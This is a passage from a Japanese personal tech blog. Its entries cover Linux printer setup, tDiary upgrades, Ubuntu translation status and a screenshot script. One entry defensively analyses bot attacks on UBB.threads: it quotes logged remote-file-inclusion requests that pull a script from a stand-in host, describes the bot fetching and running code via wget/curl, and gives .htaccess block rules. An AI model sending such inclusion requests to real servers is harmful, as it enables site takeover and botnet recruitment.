_ [Linux] Firefoxのシェアメモ@欧米で40%越

Firefoxのシェアメモ。欧米では40%を越えて半数に届こうかという国があるというのはさすが。OS(Windows)搭載のデフォルトのブラウザでいいや、という消極的消費層がいることを考えると、よく健闘してますね。

さておき、Firefoxを使っていてたまに不満になるのは、公共性の高い役所とか大手企業のサイトで、IEベタベタなページだったりするのは嫌ですねぇ。IEとFirefoxの両方で検証するコストを考えたら、辛うじて理解でき...なくもないですが、 "Firefoxにも対応しておかないとまずい" と当たり前のように思わせるくらい、Firefoxが普及してほしいところです。

ITmedia - Firefoxのシェア、欧州で28％に
http://www.itmedia.co.jp/news/articles/0801/30/news076.html
@IT - 日本は10％強、国民性の違い？Firefoxシェア世界一はフィンランド、45.4％で群を抜く
http://www.atmarkit.co.jp/news/200801/30/mozilla.html
Xiti Monitor - Relaunch of Mozilla Firefox’s visit share in the European countries at the end of 2007
http://www.xitimonitor.com/en-us/browsers-barometer/firefox-december-2007/index-1-2-3-117.html
Mozilla Links - Firefox の世界マーケットシェアが 21.1% に達する
http://mozlinks-jp.blogspot.com/2008/01/firefox-211.html

_ [Linux] tDiary 2.2へのアップデートでてんやわんや

tdiaryをセキュリティアップデートのために2.2にアップデート。既存のフォルダに上書きするのはアレなので、新規にフォルダを作ってそちらに移植させる方法を選択。

tdiary 2.2をダウンロードして、tarで展開、アクセス制限のための.htaccessと.htpasswdファイルをコピー。また、画像等を置いたimagesフォルダもコピー。tDiary設定ファイル tdiary.confを引き継いで新たに生成するために、バージョン2.2のtdiary.conf.beginnerをベースに書き直すと、見た目が大きく変わってしまったので、tdiary.conf.sampleをベースにして書き直し。

どうも、日記の更新時に「この日付の日記を編集」ボタンをクリックすると、本文のスタイルが「tDiary」から「Wiki」スタイルになってしまう現象が起こっている...ううむ。

追記2:上記の現象は、tDiary Support BBSによると、「tDiary の仕様で、一度記入した日の日記を別のスタイルに変更することはできません。」だそうで。つまり、Blog更新のタイミングでtDiaryの設定を変更したため、Wikiモードで書き込んだ日記のエントリを、デフォルト設定がtDiaryモードの状態で、編集しようとしているのが原因だと分かりました。...ということで、ブラウザでの操作はできなくても、直接自分の手でファイルを書き換えることにしました。以下は、試してうまくいった方法なので自己責任でどぞ。

□ tDiaryで特定日付の日記を削除する方法
確認したtDiaryのバージョンは2.2。
  
0.実行の前に、必ずバックアップを取っておく。
  
1.日記データファイルの編集
  (データディレクトリ)/2008/200801.td2のように該当する月の
  td2ファイルを開き、Data :から始まる行から、該当する日の分の
  ピリオドで終わっている終わりの行までをそっくり削除する。
  ----------------------
  Data : 20080123
        :
  .
  ----------------------  
  ↑空行の後に、最後はピリオドだけの行がある。ここまで削除。
  
2.キャッシュファイルの削除
  (データディレクトリ)/cache/200801.parser
  (データディレクトリ)/cache/latest.rb
  
  のファイルを削除して、ブラウザで該当する日の日記をロードさせると
  再度キャッシュが作成されて、変更が反映される。

_ [PC] PPC版とIntel版Mac mini向けの切替器に悩む

PPC版Mac miniを使っていた上に、Intel版Mac miniも新たに購入して、親子ガメ状態。なんだか、正月のおせちのお重みたいでなかなかカッコイイんですが、いちいちケーブルをつなぎ変えるのが面倒なので、PC切替器を買うことにしたときのメモ。

Coregaから出ている、USB/VGAタイプの切替器CG-PC2UVAMNを購入してみたけど、Mac用のキーボードMB110J/Aが効かない現象に悩まされる。

この切替器には、キーボードコネクタとマウスコネクタの2種類のUSBポートがあり、それぞれにキーボードとマウスを接続するという使い方だそうです。しかし、Mac用のキーボードをキーボードコネクタ側につないでも、全く認識されません。マウスコネクタ側につないだら、キーボードは認識するものの、PCの切替えのための信号はキーボードコネクタ側でしか受信しないようなので、切替えができません。本体にも切り替えスイッチがないのでどうすることもできない...むむ。Windows用のキーボードだとキーボードコネクタ側でちゃんと動作するんですが。キーのエミュレーションとか認識が違うのかな。

ということで、回避手段としてはMac用のキーボードではなくWindows用のキーボードを使う、またはマウスコネクタに、Mac用キーボードとマウスを接続し、さらにキーボードコネクタに切り替えスイッチとして、適当なWindows用ミニキーボードでもつないでおくか...ですかね。それか、Mac用のキーボードに対応した切替器を新たに購入するか。

RATOCからMac用キーボードにも対応したという、REX-210CUPが発売されていたのだけど、現在では在庫なし。入手困難...終了。後継のREX-220CUDPが発売されているんですが、新たにDVIコネクタに対応した切替器なので、値段が2倍ほどするのが難点。しかも、ACアダプタ使わないとパワー的に微妙っぽい。それか、バッファローコクヨサプライのBKVMU201A、BKVMU2A01Aなどは、サポートページでMac用キーボードについても言及しているので、大丈夫じゃないかなと期待。個人的な用途では、VGAのコネクタでいいんだけど。最近、欲しいと思った商品がここ2-3年で廃番になって、入手困難になっているケースが多いなぁ...orz

追記:Mac用キーボードMB110Jは、結構切替器との相性が悪そうで、princetonの切替器対応表などでもLeopard環境で動作非対応...なんだそりゃ！2chのスレでも色々な切替器で動作しない報告が出ているので、すっぱりとお金を出して、動作報告のあったREX-220CUDPにしておくのがいいかも。

corega - CPU切替器  CG-PC2UVAMN
http://www.corega.co.jp/product/list/changer/pc2uvamn.htm
Apple - キーボード(ワイヤード) MB110J/A
http://www.apple.com/jp/keyboard/
Microsoft - マイクロソフト ワイヤレス レーザー マウス 5000
http://www.microsoft.com/japan/hardware/laser/wi_laser5000.mspx
  
B000KC84RY

_ [ネタ] TVがニコ動になる時代メモ

NRIの調査と将来の姿を描いたFlashムービーへのリンク。TVがニコ動になるとは思わないけど、将来的にはニコ動のような形態のコンテンツ利用の分化が進むでしょうねー。消費者がメディア消費/作成をしたいという欲求がある以上、ネットをはじめ、ニコ動、初音ミクなどの道具は着々と揃ってきているので、時間の問題でしょう。あとは、それが一般にも広まるのがいつかということでしょうが..。

コンテンツを閉じたままにしておくと、北風と太陽の寓話のごとく、消費者の財布は固く閉ざされるので、囲い込みなくコンテンツ消費ができる仕組みが、もっと早く整ってほしいものです。空気のようにメディアを消費する。プロのクリエータや制作会社の、コンテンツ作成能力の力強さをもっと、日の当たる所に出すべきだ。モッタイナイ。

ITmedia - 2015年、テレビは「ニコ動」化する？――NRIが示す未来像
http://www.itmedia.co.jp/news/articles/0802/05/news094.html
NRI - クリエイティブ産業の変革へのシナリオ
http://www.nri.co.jp/publicity/mediaforum/2008/forum73movie.html

_ [その他] ケータイ電話の音

この記者と同じく、普段からPHSと携帯の両方を利用していますが、音質の差は明らかに違いますね。バックグラウンドで聞こえる環境音とか、通話音質そのものも違うと思うんですが、けっこうこの違いに気づかない人が多いですね。喋れればそれでいい、という人は脳内で音がマスクされてしまうので差に気づかないのかなと思ってしまいます。違いが分かる、というのがいいのか悪いのか分かりませんが、私としてはこの記者に賛成で、ケータイはもう少しだけ音質を上げてほしいのです。

ITPro - 記者のつぶやき ケータイの音はいい？悪い？
http://itpro.nikkeibp.co.jp/article/COLUMN/20080204/292900/

_ [Linux] Canon LBP3410をDebian Etchで動作させるメモ

Canon LBP3410の純正ドライバをDebian Etch(4.0)で動かそうとして、そのままでは印刷できなかったのでメモ。単にPPDドライバファイルの位置が、変わっているだけなんですが。

その他、 LBP5900SE、LBP5900、LBP5400、LBP3970、LBP3950、LBP3920、LBP3900、LBP3800、LBP3700、LBP3410といったプリンタでも、同様の手順でEtchで印刷できるようになると思われます。

追記:2008/3/17現在で、LIPSLX ver1.6ドライバがリリースされており、このバージョンからDebian Etch等のディストリビューションへの対応が追加されました。そのため、下記の手順での"PPDファイルのコピー"等の作業は必要なくなりました。詳細なインストール方法については、CanonのLIPSLX linux向けドライバサイトにあるドキュメントを参照してください。

□ LBP3410の純正ドライバのインストール方法@Debian Etch
  
1.libcupsys2-gnutls10 libgtk1.2 cupsys gs-espをインストール(されていることを確認)
  # aptitude update
  # aptitude install libcupsys2-gnutls10 libgtk1.2 cupsys gs-esp
  
2.ドライバの入手/インストール
  http://cweb.canon.jp/drv-upd/lasershot/linux/lipslxlinux.html
  からドライバを入手し、下記のコマンドの例のようにファイルを2つ指定してインストール。
  # dpkg -i cndrvcups-lipslx_1.50-2_i386a.deb cndrvcups-common_1.50-2_i386a.deb
  
3.PPDドライバのコピーとCUPSの再起動
  # cp /usr/share/cups/model/CNCUPS* /usr/share/ppd/
  # /etc/init.d/cupsys restart
  
3.CUPS設定画面での指定
  http://localhost:631/
  にアクセスして設定を進める。
  -------------------------------------------
  プリンタ名は「LBP3410」など任意で。
  デバイスは「LPD/LPR Host or Printer」で。
  デバイスURIは「lpd://(プリンタのIPアドレス)/lbp3410」とでもする。
  メーカ名「Canon」モデル「Canon LBP3410 LIPS .....」で設定。
  
4.テスト印刷
  CUPS設定画面でテスト印刷を行い、問題がなければ設定完了。
  
□ 参考URL
Canon - linux向けレーザプリンタドライバ
http://cweb.canon.jp/drv-upd/lasershot/drv_linux.html
  
   

_ [Linux] addpost_newpoll.phpへのアタックについて調べてみた

BlogなどのWebサイトを開設していれば、トラックバック/リファラSPAMやら、不正侵入を試みるアタック等に晒されるのは世の常ですが、最近addpost_newpoll.phpへのアタックが多くて、対策をしたのでそのメモ。

addpost_newpoll.phpへのアタックのメモ
  
□ addpost_newpoll.phpとは
UBB.threadsというPHPで書かれたネットフォーラム用のソフトウェアに
含まれるファイル名。
この脆弱性をはじめ、いくつかの脆弱性があるが
アタックは上記の脆弱性を狙ったもの。日本国内では、採用されているケースは
少ないと思われるが、海外フォーラムではたまに見かける。
  
□ addpost_newpoll.phpへのアタックとは
下記の例のようなリクエストとUser-Agentが、ログに記録される。
おそらくBotによるアタックと思われ、Perlで記述されているスクリプトのため
User-Agentにはlibwww-perlなどのものが残る。
--------------------------------------------
$ grep addpost access_log | cut -d ' ' -f7,12-
     :
//addpost_newpoll.php?addpoll=preview&thispath=http://example.com/shop/data/id.txt? "libwww-perl/5.79"
/diary//addpost_newpoll.php?addpoll=preview&thispath=http://example.com/shop/data/id.txt? "libwww-perl/5.79"
--------------------------------------------
  
上記のようなリクエストを送ることによって、脆弱性のあるバージョンの
UBB.threadsを使用していた場合は、上記で指定されたphpスクリプトファイルを
実行してしまう。phpスクリプト中では、exec/shell_exec/system/passthru/popenなど
の関数を利用してコマンド実行を試し、wget/curl/lwp-donwload/lynx/fetch/GETなど
のコマンド等を利用して、OS名/ユーザID/ディスク空き容量の取得、ならびに
/tmp以下へのbot用Perlスクリプトのダウンロード/実行を試みる。
ダウンロードに成功した場合は、/tmp以下のファイルを削除し、潜伏活動に入る。
  
また、bot用Perlスクリプトでは、IRCに接続してIRC経由での
指令を受け取り、httpflood/tcpflood/udpfloodなどのDDoS攻撃を行ったり、
www.google.comにクエリを投げてURLを取得し、他のサイトへのbot拡大活動を行う。
  
|悪意のあるリクエスト|--->|外部のphpスクリプトの実行|---->|bot用Perlスクリプトのダウンロードと実行|--
-->|脆弱なサイトの捜索(bot活動)|--..(繰り返し)
  
□ 上記のようなアタックへの対策
脆弱性のあるバージョンのウェブアプリを実行せず、常にセキュリティ情報に
気をつけて、必要に応じてバージョンアップを行うこと。
また、サーバ上で不要なウェブアプリが動作していないか/アクセス可能になっていないか
気を配ってサーバ管理を行うこと。
ログ/サーバ稼働状況を監視し、不正なアクセスに対してきちんとした対策を行うこと。
  
脆弱なアプリケーションがない場合、Webサーバのログにbotのログが
残るんですが、害がないとはいえ、404エラー(File not found)のままに
しておくのもしゃくだったので、SetEnvIfで明示的に拒否。
  
下記の内容を、.htaccessに追加。
------------------------------------------------
# Limit by Request_URI
SetEnvIf Request_URI "addpost_newpoll" BOT
  
Order Allow,Deny
Allow from all
Deny from env=BOT
------------------------------------------------
  
また、今回のaddpost_newpoll.phpのbotの場合は
User-Agentがlibwww-perlのものであるケースが多かったので
------------------------------------------------
SetEnvIf User-Agent "libwww-perl" BOT
  
Order Allow,Deny
Allow from all
Deny from env=BOT
------------------------------------------------
などのようにして、全て拒否してしまう手もある。
(ただし、正しい目的でlibwww-perlを利用しているユーザのアクセスも
禁止してしまうことになるので注意。また、botが利用するUser-Agentは
この限りではないので、根本的な対策ではない。)
  
□ 参考URL
JPCERT CC - マルウェアの最近の傾向と、ウェブアプリケーションの脆弱性を狙うボットの実態(PDF)
http://www.jpcert.or.jp/research/2007/recent_malware_trend.pdf
  
□ おまけ
下記のようなログも残っていたので、www827のさくらたんサーバを利用している
人の中に、bot感染している?人がいるようですよ。
すでに、さくらのサーバ管理者によって対策されたかもしれませんが。
www827.sakura.ne.jp - - [07/Feb/2008:22:40:24 +0900] "GET /myPHPCalendar/admin.php?
cal_dir=http://example.com/shop/data/id.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.805"

_ [ネタ] Piroたんのデスクトップ百景

Piroたんのデスクトップ百景発見..って、2007年11月のネタですね。え?そんなネタも知らなかったの?時代遅れor情報収集力不足だって? いいんです、後からネタを発掘するのも、これまた楽しみなんデス。だって、知らないことがたくさんあった方が楽しいじゃん。

ITmedia - デスクトップ百景 第四十五景：カスタマイズしなきゃ気がすまない？ 超・自分本位のデスクトップ
http://bb.watch.impress.co.jp/cda/desktop/20111.html

_ [航空] 10年以上ぶりの大雪の日@伊丹空港の写真

2008/2/9に大阪では、10年以上ぶりとなる大雪が降りました。と言っても大阪市内での積雪は3cmほどだったそうですので、雪国の人からすれば全然たいしたことないでしょうが..。伊丹空港周辺に出撃してみたら、なんじゃこりゃ！ここが伊丹かと叫びたいような状況だったので、適当に撮影してみました。

1枚目と4枚目の写真は、よく見たらベイパーを引いてます。まさか、伊丹で、雪の日のベイパーが撮影できるとは思ってもいませんでした。ただ、翼から派手にベイパーを出している写真は、視界が悪いためピンずれで、いまいちの出来なのでボツ。曇天の雪の日は、全てがグレーがかってしまうし、なかなかメリハリのある撮影は難しいですね。

_ [Linux] Firebirdに関するセキュリティアップデートメモ

極めて長いユーザ名を通して、スタックベースのバッファオーバーフローを引き起こす問題と、特別なパケットを送ることによってサーバのクラッシュを引き起こす問題。対策には、それぞれFirebirdのバージョンを 2.1 RC1, 2.0.4, 1.5.6以上にする必要がある。

Secunia Advisories - Firebird Multiple Vulnerabilities  SA28596
http://secunia.com/advisories/28596/
Firebird Tracker - CORE-1603
http://tracker.firebirdsql.org/browse/CORE-1603
Firebird Tracker - CORE-1681
http://tracker.firebirdsql.org/browse/CORE-1681

_ [Linux] Ubuntu Hardyのドキュメント関連翻訳情報(2008/04/09更新)

2008年4月リリース予定の、Ubuntu 8.0.4 LTS(長期サポート版)であるHardy Heronのドキュメント関連の翻訳状況を出しておきます。翻訳の提案なども気軽にできますので、英語にあまり自信がなくて、どうしようかなーと思っている方もどしどし翻訳を行ってみてください。

このリストは、launchpadのサイトのステータスページのhtmlを取得して、パースする適当なスクリプトから生成しています。現在は手動で更新していますが、頻度が高い方がいいというリクエストがあれば、cronで自動的に取得するようにしましょうかね。(launchpadから一気にリストを取得するのは、向こうのサーバに負荷がかかるし、DLに失敗することもあったため)

ドキュメントに限らず、メニュー関連や重要なパッケージなども、翻訳者募集中です。Ubuntuなどのオープンソースソフトウェアは、皆の力を合わせることによって、より良く便利なものになります。少しの力でも、多くの人が行えば大きな力になりますので、皆さんの協力をお願いします。

追記:いよいよ締切りまで残り1週間を切りました。ラストスパートです。この翻訳ステータスの更新もなるべく毎日行うようにします。RSSは更新していないようにしていることが多いので、定期的にこのページを参照してください。

追記:Ubuntuのパネルやメニューの翻訳は締切りが来ましたが、アプリの方の翻訳はまだですので、もう一息頑張りましょう。

□ Ubuntu Hardyの翻訳等のスケジュール
以下のリンクを参考にしてください。下記のubuntu-docやデスクトップでの
パネルやメニュー項目などの締切りは2008/4/10です。
    
ubuntu.com - HardyReleaseSchedule
https://wiki.ubuntu.com/HardyReleaseSchedule
---------------------------------------------------------------
2008/3/20 ドキュメント内容の決定(freeze)、ベータリリース
2008/4/10 非言語パックの翻訳締切(deadline) ubuntuインストーラ/Firefox/パネル/メニュー/ドキュメントなど
2008/4/17 言語パックの翻訳締切(deadline)  それ以外のアプリ
2008/4/24 最終リリース(Final Release)   Ubuntu 8.04 LTS
---------------------------------------------------------------  
  
□ Ubuntu Hardyでドキュメント以外に翻訳の必要なパッケージ
下記ページの一覧を参照してください。
  
Ubuntu Japanese Wiki - JapaneseLocalizedDerivative/8.04 Hardy Heronの開発
https://wiki.ubuntulinux.jp/JapaneseLocalizedDerivative/HardyHeron
  
□ ubuntu-doc関連のパッケージ作成方法
翻訳結果は、すぐにUbuntu等のアップデートに反映される訳ではないので
リアルタイムに翻訳結果を確認したい場合は、独自にパッケージを作成する
必要があります。
launchpadからスクリプトで機械的にpoファイルを取ってくることができれば
自動ビルドも可能なんですが。poファイルの取得は、メールでのダウンロード通知
だったりするケースがあり、パッケージのビルドに手間がかかるのでやっていません。
  
パッケージの作成方法は、ちょっと古くなっていますが過去の日記を参照してください。
   
  
□ ubuntu-doc関連パッケージ

パッケージ名
項目数
翻訳完了
パーセンテージ
about-ubuntu
59
58
98.31 %
add-applications
115
115
100.0 %
administrative
34
34
99.99 %
advanced-topics
21
20
95.23 %
basic-commands
129
128
99.22 %
config-desktop
37
37
100.01 %
desktop-effects
43
43
100.0 %
files-and-docs
22
22
100.0 %
games
117
117
100.0 %
hardware
165
165
100.01 %
internet
406
406
100.0 %
keeping-safe
75
74
98.67 %
musicvideophotos
222
221
99.55 %
newtoubuntu
33
33
100.0 %
office
92
92
100.0 %
printing
77
76
98.7 %
programming
82
82
100.0 %
serverguide
2030
648
31.92 %
windows
307
307
100.0 %
総計
4066
2678
65.86 %


  
□ kubuntu-doc関連パッケージ

パッケージ名
項目数
翻訳完了
パーセンテージ
about-kubuntu
73
54
73.97 %
add-applications
103
58
56.31 %
basic-concepts
144
110
76.39 %
config-desktop
86
46
53.49 %
files-and-docs
27
26
96.3 %
games
138
15
10.87 %
getting-help
25
24
96.0 %
hardware
105
45
42.86 %
internet
116
57
49.14 %
keeping-safe
44
38
86.36 %
kubuntu-docs-index
99
89
89.9 %
musicvideophotos
120
42
35.0 %
network
191
88
46.07 %
newtokubuntu
25
24
96.0 %
office
35
12
34.29 %
preface
25
24
96.0 %
printing
65
49
75.38 %
programming
82
71
86.59 %
system-settings
77
61
79.22 %
systemdocs
2
2
100.0 %
総計
1582
935
59.10 %


  
□ edubuntu-doc関連パッケージ

パッケージ名
項目数
翻訳完了
パーセンテージ
about-edubuntu
63
58
92.07 %
edubuntu-about
2
2
100.0 %
handbook
870
322
37.01 %
schooladvocacy
107
0
0.0 %
総計
1042
382
36.66 %


  
□ xubuntu-doc関連パッケージ

パッケージ名
項目数
翻訳完了
パーセンテージ
about-xubuntu
50
49
98.0 %
add-applications
76
75
98.68 %
administrative
11
10
90.91 %
advanced-topics
6
5
83.33 %
basic-commands
123
122
99.19 %
config-desktop
13
12
92.31 %
files-and-docs
5
4
80.0 %
internet
426
420
98.59 %
keeping-safe
71
70
98.59 %
musicvideophotos
150
149
99.33 %
newtoubuntu
137
122
89.05 %
office
72
71
98.61 %
printing
64
63
98.44 %
programming
68
67
98.53 %
switching
606
589
97.19 %
windows
281
278
98.93 %
xubuntu-docs-index
24
23
95.83 %
総計
2183
2129
97.53 %

_ [Linux] 玄箱Pro対応が強化されたカーネル2.6.25-rc1メモ

玄箱Proへの対応が強化されたカーネルのメモ。自分でやっている暇がないので、他力本願で(w

IT Pro - Linuxカーネル「2.6.25」のRC1バージョン公開,「玄箱PRO」に対応
http://itpro.nikkeibp.co.jp/article/NEWS/20080212/293606/
kernel.org - ver2.6.25-rc1 changelog
http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.25-rc1

_ [その他] MUFGのシステム統合に伴う変更メモ

MUFGのシステム統合に伴う、サービス等の変更点についてチェックしておくこと。自分にとって、大きな変更点などはなさそうなので良かったですが、いくつか手続きが必要なものも。

三菱東京UFJ銀行 - 新システムへの移行/統合に伴う商品・サービスのお知らせ
http://www.bk.mufg.jp/oshirase/index.html

_ [orca] ORCA画面キャプチャスクリプト公開

ORCA環境でPrintScreenキーを押すだけで画面のスクリーンショットを印刷するためのスクリプトを公開しました。標準のGNOME環境では、PrintScreenキーを押すことでgnome-screenshotが起動しますが、印刷しようと思うとさらに手間がかかりますので。 スクリプトを利用するには、imagemagickパッケージのインストールが必要です。また印刷を行うには、CUPS(cupsys-client)がインストールされており、プリンタ設定ならびにデフォルトのプリンタ指定がしてある必要があります。

追記 :2011/8/12 Ubuntu Lucid環境に合わせてスクリプトを改修し、ORCA画面キャプチャスクリプト0.2.0をリリースしました。Ubuntu Hardy環境では確認はしていませんが動作するとは思います。 Debian Etch環境で利用する場合は、従来のORCA画面キャプチャスクリプト0.1.8をお使いください。

*** ORCA画面キャプチャスクリプト ***
  
□ ダウンロード
* Ubuntu Lucid環境など向け
http://hitaki.net/orca/orca_capture_0.2.0.tar.gz
* Debian Etch環境向け
http://hitaki.net/orca/orca_capture_0.1.8.tar.gz
  

  
□ 動作環境
Debian Etch/SargeのGNOME/KDEな環境で検証をしていますが
importコマンドやlpコマンドの利用できる他の環境でも
利用できるかと思います。
  
□ インストール方法
インストールに関する詳細は、同梱のorca_capture.txtを参照してください。
  
1.imagemagickとzenityパッケージのインストール
  # aptitude update
  # aptitude install imagemagick zenity
  
2.上記のスクリプトをダウンロードして展開する
  $ tar xvzf orca_capture.tar.gz
  $ cd orca_capture
  
3.次に、設定スクリプトを実行する。
  (一般ユーザ権限で実行してください)
  $ ./orca_capture_setup.sh
  以上で設定は完了です。
  
GNOMEの場合は、このスクリプトでキー割り当てまで変更を行います。
KDEの場合は、スクリプト実行後に手動でキー割り当てが必要です。
  
□ 割り当てられるキー一覧
-------------------------------------------------------
GNOME Sarge : Pauseキー
GNOME Etch  : Printキー
KDE : Printキー (自分で設定の必要あり)
-------------------------------------------------------
  
登録がうまくいっていないようであれば、同梱の
ドキュメントを参考にしてください。
  
□ KDEでのショートカットキーの設定方法
KDEメニューより「設定」→「メニューエディタ」を選択して、
メニューエディタを起動する。
  
「新規項目」ボタンを押して、項目名に「全画面キャプチャ」など
好みに応じて入力してください。
「コマンド」の欄に「/usr/local/bin/orca_capture.sh」と入力し、
現在のショートカットキーの「なし」のボタンを押した上で、
Printキー(もしくは未割り当ての任意のキー)を押す。
  
左上にある「保存」ボタンを押して、設定を保存すれば完了となります。
  
□ オプション一覧
オプションなしで実行した場合は、デフォルトのプリンタに
A4サイズで印刷を試みます。
-------------------------------------------------------
-s オプション
-sオプションをつけて実行すると、$HOME/orca_capture以下に
capture(年月日時分秒).jpgという形式のファイル名で保存します。
この場合は、印刷は行われません。
  
例) /usr/local/bin/orca_capture.sh -s
  
-q オプション
-qオプションをつけて実行すると、実行の際に表示されるダイアログを
　表示しません。(ダイアログはzenityを利用していますので、GNOME環境
などを利用しているたいがいの場合、ダイアログが利用可能となっています。)
  
例) /usr/local/bin/orca_capture.sh -q
  
-p オプション
-pオプションをつけて実行すると、印刷の際に利用するプリンタを
指定できます。
  
例) /usr/local/bin/orca_capture.sh -p lp1
  
-h オプション
ヘルプを表示します。
-------------------------------------------------------
  
バグなどがあったら、md81bird あっとまーく hitaki.netへメールを。

_ [Linux] Linux環境で画面のスクリーンショットを撮る方法

Linux環境で画面をキャプチャして、スクリーンショットを撮る方法のメモ。普通にアプリケーションを利用して、スクリーンショットを撮るのであれば、ksnapshotが便利です。コマンドベースでスクリーンショットを撮るなら、importコマンド(imagemagickパッケージ)でしょう。

追記:最近のGnome環境であれば、gnome-screenshot(アプリケーション→アクセサリ→スクリーンショットの取得 で起動)が含まれており、PrintScreenキーやAlt + PrintScreenキーなどのショートカットキーが関連付けられているので、ショートカットキーを押すだけでスクリーンショットを撮ることができます。昨日も多機能になって便利です。

□ 画面のスクリーンショットを撮る方法@Debian
画面のスクリーンショットを撮るには、以下の方法がある
1. ksnapshotを利用する方法
  ksnapshotパッケージに含まれるので、インストールを行う。
  
  シンプルかつ、かゆいところに手が届いており
  全画面/ウィンドウのキャプチャを撮ることができ、実行時に
  キャプチャを行う際の、遅延時間を設定することも可能。
  
  ファイル名の末尾に数字がついていた場合
  screenshot1.jpg、screenshot2.jpg...と自動的にファイル名の数字が
  インクリメントされたファイル名を、デフォルトで付けられるのは便利。
  
   
  
2. gnome-screenshotを利用する方法
  gnome-utilsパッケージに含まれるので、たいがいのケースでGNOMEと
  一緒にインストールされているはず。
  
  gnomeをインストールしてある場合、printscreenキーへ割り当てられて
  いれば、キーを押すことで利用できたり、メニューから起動することができる。
  GNOME 2.14では、機能はシンプルで、全画面の取り込みしか行えないが
  GNOME 2.18では、ksnapshot同様に全画面/ウィンドウの指定や遅延時間の指定が
  行えるようになっています。
  
  
  
3. gimpを利用する方法
  定番グラフィック編集ソフトであるgimpがインストールされていること。
  このソフトも、多くの環境でデフォルトでインストールされています。
  gimpのメニューより、「ファイル」→「取り込み」→「画面取り込み」で
  画面のキャプチャを行うことができる。
  
  そのままgimpで画像加工を行うことができる点は便利。
  
  
  
4. importコマンドを利用する方法
  imagemagickパッケージがインストールされていること。
  
  $ import test.jpg
  のようなコマンドを実行し、カーソルが+になったら
  取り込みたい箇所をクリックすると、キャプチャを行うことができる。
  ファイル名の拡張子を変えるだけで、その拡張子に合った画像形式で
  保存を行うことができる。
  
  $ import -window root test2.jpg
  のようにすると、コマンドだけで全画面のキャプチャが行える。
  
  コマンドオプションの詳細は、import -helpを実行。
  (import --helpやimport -hは不可)
  
5. xwdコマンドを利用する方法
  xwdはX Windowシステムの画面ダンプユーティリティ。
  xbase-clientsパッケージに含まれるので、X Windowシステムが
  インストールされているたいがいの環境で、利用することができる。
  
  $ xwd --out hoge3.xwd
  のようにしてxwd形式のダンプを取り込むことができる。
  ただし、その後gimpのようなxwd形式に対応した画像編集ソフトで変換/加工する必要がある。
  
  詳細はman xwdを参照のこと。
  
参考URL :
[LHR]: スクリーンショットを取る
http://mcn.oops.jp/linux/topic2.10/screenshot.htm

_ [PC] RealPlayerがバッドウェアに指定@メモ

昔と比べて最近はどうも悪い方向に使い勝手が悪くなっていったので、本家のRealPlayerは止めてRealAlternativeに乗り換え。昔のファイルの互換性とかでまだまだ必要なので。しかし、ビデオ/オーディオcodecも、旧来との互換性や統一感、Win/Linux/Macで扱いやすいとなると、codecなどの乗り換えや選定も、なかなか最適解が難しいところですねー。

Internet Watch - 米消費者団体がRealPlayerを「バッドウェア」と認定
http://internet.watch.impress.co.jp/cda/news/2008/02/01/18307.html
ITmedia - RealPlayerが「バッドウェア」認定
http://www.itmedia.co.jp/news/articles/0802/04/news012.html
stopbadware.org - StopBadware.org Alert  RealPlayer
http://www.stopbadware.org/reports/reportdisplay?reportname=realplayer01282008

_ [orca] ghostscriptの脆弱性によるORCAへの影響

Debianセキュリティアドバイザリ DSA-1510-1にて、ghostscript(gs)の脆弱性が出ています。PS/PDFのインタプリタとして利用する場合、悪意のあるファイルを開いた場合に任意のコードを実行されてしまう危険性があります。

それはさておいても、Ricohのレーザープリンタを(psではなく)メーカ提供のgsドライバで利用している場合は、gs-espパッケージのアップデートによって、RicohのGhostscript用RPDLフィルタ付きのgsが上書きされてしまうため、印刷できなくなる可能性があります。

この問題に関しては、2008/4/9に、Ricohからセキュリティーアップデートに対応したgsがリリースされています。素早い対応に感謝。指示通りにインストールを行えばOKです。

また、Canonのプリンタをsarge環境かつメーカドライバで使用している場合は、Debian sarge標準のgsにopvpモジュールが含まれていないので、独自パッケージのgsをインストールすることになっています。そのため、現状ではアップデートすると、独自パッケージのgsが上書きされてしまい、印刷できなくなったり(正確には、"Unknown device :opvp"とだけ書かれた紙が印字される) 印刷速度が遅くなったりしてしまうようです(cupsの再起動を行ってない場合)。

"Unknown device :opvp"は、gsが吐いているエラーで、組み込まれていないドライバでの印刷をCUPSなどから指定された場合に、エラーを出します。対処方法としては、opvpドライバが組み込まれているgsを利用してください。(新しいgsパッケージを使う、gs-gplよりgs-espを使う、opvpドライバ組み込みのgsパッケージを追加でインストールするなど)

EtchでCanonのメーカドライバを利用している場合であれば、Debian標準のgsにopvpドライバが含まれているので、問題はありません。(2008/3/17に、Etch対応のドライバ ver1.6がリリースされています。こちらも素早い対応に感謝。)

#下記はあくまで事例であって、他社プリンタでもDebian標準のgsを置き換えて
#利用するようなドライバの場合、印刷できなくなる恐れがあります。
  
□ Debian Etchでのgsの状況
  
○ PostScript対応プリンタをpsで使用している場合
× Ricohのレーザプリンタをgsで使用している場合
○ Canonのレーザプリンタをgsで利用している場合
  
* Ricohのrpdl4ドライバが導入されている場合
$ gs-esp -h | grep rpdl
   r4081 rpdl rpdl4 samsunggdi sgirgb sj48 spotcmyk st800 stcolor sunhmono t4693d2
  
* セキュリティアップデートによってgsが上書きされてしまった場合
$ gs-esp -h | grep rpdl
   r4081 rpdl samsunggdi sgirgb sj48 spotcmyk st800 stcolor sunhmono t4693d2
  
-----------------------------------------
□ Debian Sargeでのgsの状況
  
○ PostScript対応プリンタをpsで使用している場合
× Ricohのレーザプリンタをgsで使用している場合
× Canonのレーザプリンタをgsで利用している場合
  
* Canonプリンタで利用するopvpドライバが導入されている場合
$ gs-esp -h | grep opvp
   ml600 necp6 npdl nullpage oce9050 oki182 oki4w okiibm omni oprp opvp
  
* セキュリティアップデートによってgsが上書きされてしまった場合
$ gs-esp -h | grep opvp
  (なし)
  
  
(余談)
Sarge環境で、Canonプリンタで印刷できなくなった場合は、gsのバージョンが上がってしまっているので
強引に元に戻す手法としては、パッケージキャッシュが残っている場合は
$ sudo dpkg -i /var/cache/apt/archives/gs-esp_7.07.1-9mtu5_i386.deb
して、念のためcupsの再起動を行って
$ sudo /etc/init.d/cupsys restart
で印刷が可能になります。
  
もし、パッケージキャッシュがみつからないようであれば
http://kmuto.jp/debian/mtu/pool/main/g/gs-esp/
より取得できます。
  
ただし、再インストールしてもそのままだと、アップグレードの際に
再度Debianのgs-espに置き換わってしまうので、
パッケージをholdしてアップグレードさせないようにする必要があります。
gsの独自パッケージが入っている状態で
